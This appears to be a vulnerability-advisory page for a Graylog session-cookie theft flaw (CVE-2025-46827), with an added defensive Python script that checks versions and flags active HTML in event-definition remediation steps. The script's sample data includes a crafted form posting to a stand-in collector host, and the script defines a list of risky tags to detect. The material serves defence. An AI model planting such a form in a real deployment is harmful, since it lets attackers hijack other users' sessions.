Session Cookie Vulnerability in Graylog Log Management Platform
CVE-2025-46827

8 HIGH

Key Information:

Vendor: Graylog2

CVE Published: 7 May 2025

What is CVE-2025-46827?

Graylog, an open-source log management solution, contains a vulnerability that lets an attacker capture other users' session cookies. An attacker whose account is permitted to create event definitions can place a crafted HTML form in the Event Definition Remediation Step field; when a victim with permission to view alerts opens the affected alert, the form can submit the victim's session cookie to an Input on the same Graylog server. Exploitation therefore requires an attacker account that can create event definitions, a victim who can view alerts, and an active Input capable of accepting form data (for example an HTTP input or a raw TCP input). The issue is fixed in versions 6.0.14, 6.1.10 and 6.2.0; no workaround is available when these preconditions are met, so affected deployments should upgrade.
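As an added defender's triage aid (not Graylog project code and not part of the advisory), the following Python script does two things a responder would want after reading this entry: it checks a server version against the affected ranges stated on this page, and it scans an exported list of event definitions for active HTML (form, input, script and similar tags) in their remediation steps, reporting any outbound targets those tags reference. The JSON shape (a list of objects with "title" and "remediation_steps" keys), the version-string format and the sample export are assumptions made for this example.

```python
"""Triage helper for CVE-2025-46827 (added example, not Graylog's own code).

Assumptions (not taken from the advisory): event definitions are exported as
a JSON list of objects carrying "title" and "remediation_steps" keys, and
server versions are dotted numbers such as "6.1.3" (pre-release suffixes are ignored).
"""
import json
from html.parser import HTMLParser

# Affected ranges as stated in the advisory: 6.0.x before 6.0.14, 6.1.x before 6.1.10.
AFFECTED_RANGES = (((6, 0, 0), (6, 0, 14)), ((6, 1, 0), (6, 1, 10)))

# Tags that turn a free-text field into something that can collect input or run script.
RISKY_TAGS = {"form", "input", "button", "script", "iframe", "object", "embed"}


def parse_version(text):
    """Turn '6.1.3' into (6, 1, 3); suffixes like '-rc1' or '+build' are dropped."""
    core = text.strip().split("-")[0].split("+")[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_affected(version_text):
    """True when the version falls inside one of the advisory's vulnerable ranges."""
    v = parse_version(version_text)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


class _TagCollector(HTMLParser):
    """Collects lower-cased tag names and outbound targets found in a text field."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.targets = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag.lower())
        for name, value in attrs:
            if name.lower() in ("action", "src", "href", "formaction") and value:
                self.targets.append(value)


def inspect_remediation(text):
    """Return the risky tags and outbound targets embedded in one remediation step."""
    collector = _TagCollector()
    collector.feed(text or "")
    risky = sorted(set(collector.tags) & RISKY_TAGS)
    return {"risky_tags": risky, "targets": collector.targets}


def scan_event_definitions(raw_json):
    """Flag event definitions whose remediation steps carry active HTML."""
    findings = []
    for definition in json.loads(raw_json):
        result = inspect_remediation(definition.get("remediation_steps", ""))
        if result["risky_tags"]:
            findings.append({"title": definition.get("title", "?"), **result})
    return findings


# Constructed sample export (not real data): one benign and one suspicious definition.
SAMPLE_EXPORT = json.dumps([
    {"title": "Disk almost full",
     "remediation_steps": "Check /var and rotate logs."},
    {"title": "Login failures",
     "remediation_steps": "<form action=\"http://collector.example/\" method=\"post\">"
                          "<input name=\"note\"><button>Submit</button></form>"},
])

if __name__ == "__main__":
    for ver in ("6.0.13", "6.1.3", "6.1.10", "6.2.0"):
        print(ver, "affected" if is_affected(ver) else "not affected")
    for finding in scan_event_definitions(SAMPLE_EXPORT):
        print(finding)
```

Run it against a real export (or a JSON dump from the API endpoint that lists event definitions) and treat every finding as a candidate for review; remediation steps are free text, so any HTML at all in that field is unusual enough to warrant a look, and the version check tells you whether the server still needs the upgrade the advisory calls for.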


Affected Version(s)

graylog2-server < 6.0.14 (fixed in 6.0.14)

graylog2-server >= 6.1.0, < 6.1.10 (fixed in 6.1.10)

References

CVSS V3.1

Score: 8
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Unchanged

Timeline

  • Vulnerability published

  • Vulnerability Reserved
